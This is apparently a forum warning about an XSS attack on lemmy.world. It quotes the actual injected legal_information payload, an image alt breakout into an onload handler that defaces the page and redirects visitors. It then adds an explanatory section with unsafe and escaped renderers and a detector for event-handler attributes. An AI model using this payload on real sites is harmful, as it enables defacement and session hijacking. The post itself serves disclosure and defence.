# DO NOT OPEN THE “LEGAL” PAGE — lemmy.world is a victim of an XSS attack right
now and the hacker simply injected a JavaScript redirection into the sidebar. It
appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if
this is also true for community sidebars.
[https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png]
EDIT: the exploit is also in the tagline that appears on top of the main feed
for status updates, like the following one for SDF Chatter:
[https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png]
[https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png]
EDIT 2: The legal information field also has that exploit, so that when you go
to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s
using double-quotes.

```
"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
```
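The post's root cause is a markdown image whose alt text is interpolated into an HTML attribute without escaping. The following is an added example (not Lemmy's code) showing that bug class beside its hardened form, plus a check a defender could run over rendered sidebar, tagline or legal_information HTML; all function names and the sample alt text are constructed.

```javascript
// Added example, not Lemmy's code: render a markdown image ![alt](src "title")
// with escaped attribute values, and scan rendered HTML for inline event
// handler attributes. All names below are hypothetical.

// Escape the characters that can terminate a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// The bug class from the post: raw interpolation lets a quote inside the
// alt text close the attribute early and start a new one.
function renderImageUnsafe(alt, src, title) {
  return `<img alt="${alt}" src="${src}" title="${title}">`;
}

// Hardened form: every user-controlled value is escaped and src is limited
// to http(s) URLs.
function renderImageSafe(alt, src, title) {
  const url = /^https?:\/\//i.test(src) ? src : "";
  return `<img alt="${escapeAttr(alt)}" src="${escapeAttr(url)}" title="${escapeAttr(title)}">`;
}

// Check for rendered sidebar/tagline/legal_information HTML: walk each tag's
// attributes (consuming quoted values so text inside them is not mistaken
// for an attribute name) and flag any on* attribute.
function hasInlineEventHandler(html) {
  const tagRe = /<[a-z][a-z0-9]*([^>]*)>/gi;
  const attrRe = /\s([a-z][a-z0-9-]*)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/gi;
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    attrRe.lastIndex = 0;
    let attr;
    while ((attr = attrRe.exec(tag[1])) !== null) {
      if (/^on/i.test(attr[1])) return true;
    }
  }
  return false;
}

// Constructed alt text with the same shape as the injection in the post.
const CONSTRUCTED_ALT = '" onload="attackerControlledCode()';
const SAMPLE_SRC = "https://example.invalid/image.png";
const unsafeHtml = renderImageUnsafe(CONSTRUCTED_ALT, SAMPLE_SRC, "lw");
const safeHtml = renderImageSafe(CONSTRUCTED_ALT, SAMPLE_SRC, "lw");
```

A naive regex such as `/ on\w+=/` would also fire on the escaped output, because the text `onload=` still appears inside the quoted alt value; the attribute walker above avoids that false positive.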
Apparently a code injection via JavaScript in the comments has succeeded. With that, admin cookies can be stolen, and the instance therefore belongs to the attackers.
It surprises me somewhat to read nothing at all about it here?
Other instances have defederated from lemmy.world for the time being. Does that help? Is that happening here too?